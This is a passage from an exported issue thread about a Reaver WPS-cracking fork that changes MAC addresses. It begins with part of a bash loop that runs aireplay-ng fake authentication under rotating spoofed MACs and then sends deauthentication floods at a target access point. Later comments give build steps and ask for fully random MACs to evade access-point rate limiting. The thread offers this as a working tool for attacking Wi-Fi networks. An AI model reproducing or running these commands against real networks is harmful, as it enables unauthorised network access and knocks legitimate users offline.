aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"0" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"1"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"1" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"2"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"2" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"3"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"3" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $DEAUTH'deauths'
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -0 $DEAUTH -a $TARGET $MON & sleep $DELAY; killall aireplay-ng
echo XXXXXXXXXXXXXXXXXXX
echo Number of loops remaining =: $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo XXXXXXXXXXXXXX END OF LOOP XXXXXXXXXXXXXX
let COUNT=COUNT-1
done

Original comment by muske...@yahoo.com on 7 Aug 2012 at 7:29

GoogleCodeExporter commented 9 years ago
upload to mediafire   

http://www.mediafire.com/?sptpfv9kgnof0nr

Original comment by rasimc...@gmail.com on 2 Jul 2013 at 7:54

GoogleCodeExporter commented 9 years ago
Can you help with the installation?

Original comment by rasimc...@gmail.com on 2 Jul 2013 at 7:58

GoogleCodeExporter commented 9 years ago
Extract the tarball

    tar -xzvf reaver-1.4-mac-changer.tar.gz

Install Required Libraries and Tools

    sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

Build Reaver

    cd reaver-1.4-mac-changer
    cd src
    ./configure
    make

Install Reaver

    sudo make install

Original comment by gabrielr...@gmail.com on 2 Jul 2013 at 5:01

GoogleCodeExporter commented 9 years ago
thanks

Original comment by rasimc...@gmail.com on 4 Jul 2013 at 6:58

GoogleCodeExporter commented 9 years ago
Now you can grab the code via Github: 
https://github.com/gabrielrcouto/reaver-wps

Original comment by gabrielr...@gmail.com on 24 Mar 2014 at 2:53

GoogleCodeExporter commented 9 years ago
Hi Bob, is there any new update on your code? ;)

Original comment by itmanvn on 26 Mar 2014 at 7:35

GoogleCodeExporter commented 9 years ago
Hi itmanvn,

Unfortunately not :-(

Do you have any idea that I can implement? 

Original comment by gabrielr...@gmail.com on 26 Mar 2014 at 5:48

GoogleCodeExporter commented 9 years ago
Can you improve this to generate random mac every 5(or something like this) 
attempts? This would be really helpful against "AP Rate Limiting". I mean 
really new MAC, not only last digit.

Original comment by Xas...@gmail.com on 3 Apr 2014 at 7:07

GoogleCodeExporter commented 9 years ago
Please give me the reaver-14-mac-changer tar, both of your links are not working, 
and also write about how to use it step by step with an example.

Original comment by patilary...@gmail.com on 12 Apr 2014 at 7:31

GoogleCodeExporter commented 9 years ago
Patilary, download the code from my git repository: 
https://github.com/gabrielrcouto/reaver-wps, it's working and it's the same as 
reaver-1.4-mac-changer.tar.gz.

About the step-by-step (guide), you will find some instructions in my git 
repository or you can use the bash script posted in this thread by muske.

Xas, I can improve the generation of random macs, but I need to find a new 
notebook, on my macbook reaver doesn't work =(

Original comment by gabrielr...@gmail.com on 13 Apr 2014 at 3:17